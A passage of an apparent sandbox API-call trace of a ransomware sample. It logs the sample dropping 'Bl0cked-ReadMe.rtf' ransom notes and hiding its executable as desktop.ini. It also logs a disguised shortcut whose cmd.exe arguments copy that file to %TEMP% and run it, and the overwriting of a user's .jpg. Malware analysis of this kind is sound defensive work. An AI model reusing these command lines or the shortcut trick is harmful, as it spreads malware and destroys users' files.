\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x110, hThread=0x114, dwProcessId=0x80c, dwThreadId=0xfcc)) returned 1 [0143.340] CloseHandle (hObject=0x110) returned 1 [0143.340] CloseHandle (hObject=0x114) returned 1 [0143.340] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj\\j4m1cX oc5jpl3U0YC\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2rewelj\\j4m1cx oc5jpl3u0yc\\bl0cked-readme.rtf")) returned 0xffffffff [0143.340] GetLastError () returned 0x2 [0143.340] CopyFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), lpNewFileName="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj\\j4m1cX oc5jpl3U0YC\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2rewelj\\j4m1cx oc5jpl3u0yc\\bl0cked-readme.rtf"), bFailIfExists=0) returned 1 [0143.342] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj\\j4m1cX oc5jpl3U0YC\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2rewelj\\j4m1cx oc5jpl3u0yc\\bl0cked-readme.rtf")) returned 0x20 [0143.343] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0143.343] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj\\j4m1cX oc5jpl3U0YC", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0143.343] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0143.343] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0143.343] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0143.343] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0x87 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0x87 [0143.343] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0143.343] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj\\j4m1cX oc5jpl3U0YC\\", lpszShortPath=0x123027c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\") returned 0x2c [0143.343] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0xb2 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0xb2 [0143.343] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0143.343] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj\\j4m1cX oc5jpl3U0YC", lpszShortPath=0x123003c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1") returned 0x2b [0143.344] CharUpperBuffW (in: lpsz="attrib -r -s -h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\desktop.ini\" && attrib +h \"[TO_DIR]\"", cchLength=0x16a | out: lpsz="ATTRIB -R -S -H \"C:\\USERS\\EEBSYM5\\PICTURES\\LR0AR2~1\\J4M1CX~1\\DESKTOP.INI\" & DEL /F /Q \"C:\\USERS\\EEBSYM5\\PICTURES\\LR0AR2~1\\J4M1CX~1\\DESKTOP.INI\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\EEBSYM5\\PICTURES\\LR0AR2~1\\J4M1CX~1\\DESKTOP.INI\" && ATTRIB +H \"C:\\USERS\\EEBSYM5\\PICTURES\\LR0AR2~1\\J4M1CX~1\\DESKTOP.INI\" && ATTRIB +H \"[TO_DIR]\"") returned 0x16a [0143.344] CharUpperBuffW (in: lpsz="[TO_DIR]", cchLength=0x8 | out: lpsz="[TO_DIR]") returned 0x8 [0143.344] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb88*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb78 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\"", lpProcessInformation=0x12fb78*(hProcess=0x114, hThread=0x110, dwProcessId=0xfdc, dwThreadId=0x85c)) returned 1 [0143.381] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0xffffffff) returned 0x0 [0144.531] CloseHandle (hObject=0x114) returned 1 [0144.531] CloseHandle (hObject=0x110) returned 1 [0144.531] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0144.531] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj\\j4m1cX oc5jpl3U0YC", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0144.531] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0144.531] GetTickCount () returned 0x2d181 [0144.531] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbfc | out: lpPerformanceCount=0x12fbfc*=20132042061) returned 1 [0144.531] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x6c\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0144.531] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x36\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0144.531] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x58\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0144.531] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x5a\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0144.531] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x68\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0144.531] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x71\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0144.531] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x4b\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0144.531] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x4f\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0144.531] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0144.531] CharUpperBuffW (in: lpsz="explorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x65 | out: lpsz="EXPLORER.EXE \"[DIR_NAME]\" & TYPE \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x65 [0144.531] CharUpperBuffW (in: lpsz="[DIR_NAME]", cchLength=0xa | out: lpsz="[DIR_NAME]") returned 0xa [0144.532] CharUpperBuffW (in: lpsz="explorer.exe \"j4m1cX oc5jpl3U0YC\" & type \"j4m1cX oc5jpl3U0YC\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x75 | out: lpsz="EXPLORER.EXE \"J4M1CX OC5JPL3U0YC\" & TYPE \"J4M1CX OC5JPL3U0YC\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x75 [0144.532] CharUpperBuffW (in: lpsz="[HID_NAME]", cchLength=0xa | out: lpsz="[HID_NAME]") returned 0xa [0144.532] CharUpperBuffW (in: lpsz="explorer.exe \"j4m1cX oc5jpl3U0YC\" & type \"j4m1cX oc5jpl3U0YC\\desktop.ini\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x76 | out: lpsz="EXPLORER.EXE \"J4M1CX OC5JPL3U0YC\" & TYPE \"J4M1CX OC5JPL3U0YC\\DESKTOP.INI\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x76 [0144.532] CharUpperBuffW (in: lpsz="[EXE_NAME]", cchLength=0xa | out: lpsz="[EXE_NAME]") returned 0xa [0144.532] CoInitialize (pvReserved=0x0) returned 0x0 [0144.532] CoCreateInstance (in: rclsid=0x4e06a4*(Data1=0x21401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x4b0dcc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12fc10 | out: ppv=0x12fc10*=0x1d3e18) returned 0x0 [0144.533] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d36fc*(Data1=0x214f9, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3df0) returned 0x0 [0144.533] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d370c*(Data1=0x10b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3dfc) returned 0x0 [0144.533] ShellLink:IShellLinkW:SetPath (This=0x1d3df0, pszFile="%SystemRoot%\\system32\\cmd.exe") returned 0x0 [0144.534] ShellLink:IShellLinkW:SetArguments (This=0x1d3df0, pszArgs="/C explorer.exe \"j4m1cX oc5jpl3U0YC\" & type \"j4m1cX oc5jpl3U0YC\\desktop.ini\" > \"%TEMP%\\l6XZhqKO.exe\" && \"%TEMP%\\l6XZhqKO.exe\"") returned 0x0 [0144.534] ShellLink:IShellLinkW:SetWorkingDirectory (This=0x1d3df0, pszDir="%CD%") returned 0x0 [0144.534] ShellLink:IShellLinkW:SetIconLocation (This=0x1d3df0, pszIconPath="%SystemRoot%\\system32\\shell32.dll", iIcon=3) returned 0x0 [0144.535] ShellLink:IShellLinkW:SetShowCmd (This=0x1d3df0, iShowCmd=7) returned 0x0 [0144.535] ShellLink:IPersistFile:Save (This=0x1d3dfc, pszFileName="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj\\j4m1cX oc5jpl3U0YC.lnk", fRemember=0) returned 0x0 [0144.541] ShellLink:IUnknown:Release (This=0x1d3dfc) returned 0x2 [0144.541] ShellLink:IUnknown:Release (This=0x1d3df0) returned 0x1 [0144.541] ShellLink:IUnknown:Release (This=0x1d3e18) returned 0x0 [0144.541] CoUninitialize () [0144.542] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0144.542] ReleaseMutex (hMutex=0xf8) returned 1 [0144.542] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0144.542] ReleaseMutex (hMutex=0xf8) returned 1 [0144.542] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0144.542] ReleaseMutex (hMutex=0xf8) returned 1 [0144.542] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0144.542] ReleaseMutex (hMutex=0xf8) returned 1 [0144.542] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj\\j4m1cX oc5jpl3U0YC\\qgVefxhoS8T3s19q574.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2rewelj\\j4m1cx oc5jpl3u0yc\\qgvefxhos8t3s19q574.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0144.542] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.542] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x383a [0144.542] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.542] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=20133153310) returned 1 [0144.542] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.542] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x383a [0144.542] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.542] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.543] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x383a [0144.543] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.543] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0144.543] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x383a [0144.543] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0144.543] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.543] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x383a [0144.543] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.543] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.543] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x383a [0144.543] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.543] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.543] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x383a [0144.543] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.543] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.543] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x383a [0144.543] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.543] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.543] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x383a [0144.543] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.543] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.544] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x383a [0144.544] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.544] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x3352 [0144.544] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0144.545] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0144.545] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0144.545] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x383a [0144.545] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0144.545] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0144.545] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0144.545] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x383a [0144.545] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0144.545] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0144.545] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x1c1c, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x1c1c, lpOverlapped=0x0) returned 1 [0144.545] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0144.545] WriteFile (in: hFile=0x114, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x1c1c, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x1c1c, lpOverlapped=0x0) returned 1 [0144.545] SetFilePointer (in: hFile=0x114, lDistanceToMove=-7196, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1c1e [0144.545] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x1c1c, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x1c1c, lpOverlapped=0x0) returned 1 [0144.545] SetFilePointer (in: hFile=0x114, lDistanceToMove=-7196, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1c1e [0144.545] WriteFile (in: hFile=0x114, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x1c1c, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x1c1c, lpOverlapped=0x0) returned 1 [0144.549] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="qgVefxhoS8T3s19q574.jpg", 